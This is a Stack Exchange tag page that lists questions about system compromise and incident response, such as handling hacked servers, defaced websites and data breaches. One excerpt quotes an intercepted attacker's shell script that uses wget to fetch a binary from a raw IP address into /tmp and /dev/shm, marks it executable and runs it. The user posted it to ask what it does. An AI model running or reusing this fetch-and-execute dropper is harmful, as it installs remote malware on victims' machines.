Questions tagged [system-compromise]

Dealing with a system compromise: your defenses failed, now what?

Dealing with a system compromise: your defenses failed, now what?

First, read How do I deal with a compromised server?

Common issues

146 questions
186
votes
6 answers

How do I deal with a compromised server?

I suspect that one or more of my servers is compromised by a hacker, virus, or other mechanism: What are my first steps? When I arrive on site should I disconnect the server, preserve "evidence", are there other initial considerations? How do I go…
Lucas Kauffman
  • 54,169
  • 17
  • 112
  • 196
171
votes
10 answers

Should I be concerned if the "FBI" has logged onto my Ubuntu VPS?

Yesterday, I was performing a bit of general maintenance on a VPS of mine, using the IPMI console my host provided. Upon setting up SSH keys again via the IPMI console, I logged in via SSH and was shocked to see this: Welcome to Ubuntu 14.04.2 LTS…
lol what is this
  • 1,551
  • 2
  • 9
  • 11
166
votes
10 answers

How do you explain the necessity of "nuke it from orbit" to management and users?

When a machine has been infected with malware, most of us here immediately identify the appropriate action as "nuke it from orbit" - i.e. wipe the system and start over. Unfortunately, this is often costly for a company, especially if backups are…
Polynomial
  • 132,208
  • 43
  • 298
  • 379
73
votes
8 answers

How can Twitter and GitHub be sure that they haven't been hacked?

Yesterday, Twitter anounced that they recently identified a bug that stored passwords unmasked in an internal log. Recently, Github also had a similar bug. In both cases, they claim that nobody had access to these files. Twitter: We have fixed the…
Kepotx
  • 822
  • 1
  • 8
  • 16
69
votes
7 answers

Is it possible the person sitting across from me at Starbucks was trying to hack my laptop?

I was using my laptop at a Starbucks on a table, and a person was using a laptop on the same table across from me, a couple seats to my side. He flicked some plastic thing across the table towards my laptop. What really freaked me out was he then…
Murvin
  • 653
  • 1
  • 5
  • 4
28
votes
4 answers

A tiny version of wget (51 bytes?)

On this ISC article on DVR compromise the author talks about the compromise of an embedded system. In particular, the attacker executes a series of echo commands on the remote host, and: This DVR has no "upload" feature. There is no wget nor is…
lorenzog
  • 1,911
  • 11
  • 18
28
votes
12 answers

Is there a secure way to transfer data outside the Internet?

Since, recently, it has been proven that transferring data through the usb port is fundamentally flawed, I'm wondering if there are 100% secure ways to transfer data without using the Internet. Suppose Alan has a computer system that has been…
24
votes
7 answers

A government agency sent our website admin an email that our website had been defaced

We got an official email saying that our website had been hacked. They cited the URL to use to see the new suspicious file that had been dropped in our web root folder (s.htm). Just some text about a "Morrocan Made hacker - I'm Back" in the HTML…
Grantly
  • 351
  • 2
  • 7
16
votes
5 answers

KeePass security local malware

Can a malware that infected your local computer compromise a KeePass database stored locally in any way? If yes, what's the point for KeePass to have such strong security mechanisms if it cannot resist to this scenario? If you keep your DB locally,…
KB303
  • 423
  • 2
  • 5
  • 15
15
votes
1 answer

Should a server be considered compromised simply because a port was open?

Earlier today I received a notification of a security incident at Mandrill. At first I was concerned, but then after I dove into the details I became confused as to why they considered this noteworthy at all. To summarize, it appears that Mandrill…
Michael Hampton
  • 3,877
  • 1
  • 22
  • 32
13
votes
3 answers

What does this sh script do if executed?

I have intercepted an attack on my web server that I believe was unsuccessful. The attacker tried to execute this script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/shm ; wget…
Patrick Bassut
  • 233
  • 2
  • 7
13
votes
3 answers

Would encrypting a database protect against a compromised admin account?

I was discussing with someone ways to prevent data disclosure from a compromised admin account on a database server. The other person proposed encrypting the data at rest within the database. It sounds like a good idea, but I wasn't sure if that…
Kevin Mirsky
  • 494
  • 3
  • 13
11
votes
1 answer

How do I deal with a compromised network device?

I suspect that a network device (modem, router. switch, access point, etc) is compromised. What should I do?
André Borie
  • 12,706
  • 3
  • 39
  • 76
10
votes
3 answers

Yahoo Security Breach Affecting 500,000,000+ Accounts: Why would they believe it was "state-sponsored"?

It was recently disclosed that private information pertaining to over 500 million Yahoo accounts was stolen. Yahoo's Chief Information Security Officer, Bob Lord, states that the information was stolen from Yahoo's computers by what Yahoo "believes…
10
votes
2 answers

How did hackers compromise my EC2 instance?

My EC2 instance was hacked recently. It doesn't really matter as I'm just starting my website and there was no sensitive information on my server yet, but I do plan for there to be in the future. I am going to terminate the compromised server and…
Dennis
  • 101
  • 1
  • 4
1
2 3
9 10